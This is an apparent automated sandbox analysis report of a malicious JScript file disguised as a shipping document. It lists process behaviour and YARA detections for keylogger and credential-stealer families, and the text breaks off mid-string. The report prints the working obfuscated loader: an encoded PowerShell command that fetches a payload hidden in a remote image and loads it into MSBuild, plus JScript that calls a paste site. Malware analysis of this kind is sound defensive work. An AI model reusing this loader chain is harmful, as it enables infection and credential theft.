                                                                                                                                  Age: 447750
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  Cf-Cache-Status: HIT
                                                                                                                                  Last-Modified: Wed, 23 Apr 2025 07:02:09 GMT
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ch1kigogmWRsHuySsToIesGmhWRn6Mhz2st93OV2NB%2FaBW3wD7DoGiRCSNsN2bdenTZOIbs5Ra7FkLYAKprVyVSdbU9HnMJ5cHTg84%2F7fW2YdQzoKTFdztPvEKwmEUCFKRUGW6R2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=140012&min_rtt=139821&rtt_var=29789&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=28748&cwnd=252&unsent_bytes=0&cid=b91cc1996b5f6905&ts=353&x=0"
                                                                                                                                  2025-04-28 11:24:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 33 36 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>173.244.56.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85036</ZipCode><TimeZone>America/Phoenix</TimeZon


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  • File
                                                                                                                                  • Registry
                                                                                                                                  • Network

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:07:24:06
                                                                                                                                  Start date:28/04/2025
                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js"
                                                                                                                                  Imagebase:0x7ff695850000
                                                                                                                                  File size:170'496 bytes
                                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true
                                                                                                                                  Show Windows behavior

                                                                                                                                  File Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Section Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Registry Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  COM Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  Show Windows behavior

                                                                                                                                  Thread Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Memory Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  Show Windows behavior

                                                                                                                                  Windows UI Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                  General

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:07:24:23
                                                                                                                                  Start date:28/04/2025
                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($fronts));Invoke-Expression $allocryptic;"
                                                                                                                                  Imagebase:0x7ff7d5ca0000
                                                                                                                                  File size:452'608 bytes
                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true
                                                                                                                                  Show Windows behavior

                                                                                                                                  File Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Section Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Registry Activities

                                                                                                                                  Powershell Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Mutex Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Process Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Thread Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Memory Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  System Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  Show Windows behavior

                                                                                                                                  Windows UI Activities

                                                                                                                                  Process Token Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                  General

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:07:24:23
                                                                                                                                  Start date:28/04/2025
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff68dae0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false
                                                                                                                                  Show Windows behavior

                                                                                                                                  File Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Section Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  Show Windows behavior

                                                                                                                                  Mutex Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  Show Windows behavior

                                                                                                                                  Thread Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Memory Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  Show Windows behavior

                                                                                                                                  Windows UI Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                  General

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:07:24:37
                                                                                                                                  Start date:28/04/2025
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                  Imagebase:0x500000
                                                                                                                                  File size:262'432 bytes
                                                                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2507426885.0000000002959000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false
                                                                                                                                  Show Windows behavior

                                                                                                                                  File Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Section Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Registry Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Mutex Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Process Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Thread Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  Memory Activities

                                                                                                                                  Show Windows behavior

                                                                                                                                  System Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                  Network Activities

                                                                                                                                  Process Token Activities

                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                  Disassembly

                                                                                                                                  Code Analysis

                                                                                                                                  Call Graph

                                                                                                                                  Hide Legend
                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  callgraph clusterC0 clusterC2C0 clusterC4C0 clusterC6C0 clusterC8C0 clusterC10C0 clusterC12C0 clusterC14C0 clusterC16C0 clusterC18C0 clusterC20C0 clusterC22C0 clusterC24C0 clusterC26C0 E1C0 entry:C0 F3C2 join E1C0->F3C2 F5C4 split E1C0->F5C4 F9C8 join E1C0->F9C8 F11C10 split E1C0->F11C10 F13C12 join E1C0->F13C12 F15C14 split E1C0->F15C14 F17C16 join E1C0->F17C16 F19C18 split E1C0->F19C18 F21C20 join E1C0->F21C20 F23C22 split E1C0->F23C22 F25C24 join E1C0->F25C24 F27C26 split E1C0->F27C26 F7C6 ActiveXObject()

                                                                                                                                  Script:

                                                                                                                                  Code
                                                                                                                                  0
                                                                                                                                  var maidenlike = "MS\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28XML2.S\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28erver\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28XML\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28HTTP".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                  • "MS\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8XML2.S\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8erver\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8XML\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8HTTP".split("\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8") ➔ MS,XML2.S,erver,XML,HTTP
                                                                                                                                  • MS,XML2.S,erver,XML,HTTP.join("") ➔ "MSXML2.ServerXMLHTTP"
                                                                                                                                  • Show all Function Runs
                                                                                                                                  1
                                                                                                                                  var Shumen = new ActiveXObject ( maidenlike );
                                                                                                                                    2
                                                                                                                                    var basketcases = "h\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28t\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28t\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28p\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28:\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28p\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28a\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28s\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28t\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28e\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28.\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28e\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28e\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28d\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28f\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28a\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e287\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28O\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28M\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28k\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e282\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e280\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28/\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e280".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "h\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8t\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8t\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8p\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8:\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8/\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8/\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8p\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8a\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8s\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8t\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8e\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8.\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8e\